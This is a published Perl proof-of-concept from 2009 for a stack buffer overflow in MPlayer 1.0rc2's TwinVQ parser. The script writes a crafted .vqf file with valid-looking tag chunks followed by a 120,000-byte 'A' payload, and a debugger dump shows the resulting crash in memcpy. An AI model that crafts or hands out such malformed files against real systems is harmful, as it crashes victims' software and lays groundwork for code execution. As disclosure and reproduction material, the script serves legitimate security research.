# Title : MPlayer 1.0rc2 TwinVQ Stack Buffer Overflow PoC
# Published : 2009-01-16
# Author : sCORPINo
#!/usr/bin/perl
# MPlayer 1.0rc2 TwinVQ Stack Buffer Overflow PoC
# PoC by Amirreza Aminsalehi "sCORPINo"
# (Proud To be an Abay)
# scorpino x40 gmail x2e com
# Snoop Security Researching Committee
# www.snoop-security.com
# Originally this bug was discovered by Tobias Klein
# advisory @ http://trapkit.de/advisories/TKADV2008-014.txt
# Tested on a Windows XP SP2 English system; MPlayer gets SIG 11 after opening the PoC ;)
# I didn't find any document that explains the VQF file format, so I reversed the file format to get the headers.
# special tnX to: Shahriyar, Adel, Alireza, Yashar and all snoop members
###########################################################################################
# You Can See Debug dumps here:
#
#(8ec.748): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=0c6257d4 ebx=001f4150 ecx=030fc9f5 edx=00000001 esi=00232fff edi=00215abc
#eip=77c46fa3 esp=001f4120 ebp=001f4128 iopl=0 nv up ei pl nz ac pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210216
#*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\msvcrt.dll -
#msvcrt!memcpy+0x33:
#77c46fa3 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
#0:000> g
#(8ec.748): Access violation - code c0000005 (!!! second chance !!!)
#eax=0c6257d4 ebx=001f4150 ecx=030fc9f5 edx=00000001 esi=00232fff edi=00215abc
#eip=77c46fa3 esp=001f4120 ebp=001f4128 iopl=0 nv up ei pl nz ac pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200216
#msvcrt!memcpy+0x33:
#77c46fa3 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
###########################################################################################
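# Writes a TwinVQ (.vqf) file whose tag chunks look well-formed but are
# followed by an oversized payload. The debug dump above shows the crash in
# msvcrt!memcpy with a copy count far larger than the payload; the copy length
# is presumably taken from the file without a bounds check (TODO confirm
# against the demuxer source), which is the defect a fix would need to close.
use strict;
use warnings;

my $file = "amir.vqf";

# Three-arg open: a two-arg open would let a leading '>' or '|' in $file
# change the mode. Binary mode keeps the header bytes from being translated.
open(my $FILE, '>', $file) or die "Cannot open $file: $!";
binmode($FILE);

# NOTE(review): the published listing lost its backslashes in transcription;
# the "\x.." escapes below are the hex byte literals the author intended.
my $head  = "\x00\x01\xD4\xC0";   # SIZE (follows the "TWIN" magic + version)
my $head2 = "\x43\x4f\x4d\x4d";   # COMM chunk id

# Remaining tag chunks, 16 bytes per line. Decoded: COMM (size 0x10, 16 bytes
# of data), NAME "Gilded Cage", AUTH "Blackmore\x91s Night", "(c) " "Jura",
# ALBM "Secret Voyage", TRCK "03", then the DATA chunk id and the first byte
# of its size field.
my $head3 = "\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x60\x00\x00\x00\x2c".
            "\x00\x00\x00\x00\x4e\x41\x4d\x45\x00\x00\x00\x0b\x47\x69\x6c\x64".
            "\x65\x64\x20\x43\x61\x67\x65\x41\x55\x54\x48\x00\x00\x00\x11\x42".
            "\x6c\x61\x63\x6b\x6d\x6f\x72\x65\x91\x73\x20\x4e\x69\x67\x68\x74".
            "\x28\x63\x29\x20\x00\x00\x00\x04\x4a\x75\x72\x61\x41\x4c\x42\x4d".
            "\x00\x00\x00\x0d\x53\x65\x63\x72\x65\x74\x20\x56\x6f\x79\x61\x67".
            "\x65\x54\x52\x43\x4b\x00\x00\x00\x02\x30\x33\x44\x41\x54\x41\x0c";

# The "A" repeat count is the author's guess, not a tuned value.
print {$FILE} "TWIN97012000" . $head . $head2 . $head3 . ("A" x 120000);

# Write errors on a buffered handle only surface at close, so check it too.
close($FILE) or die "Cannot close $file: $!";

print "$file has been created\n";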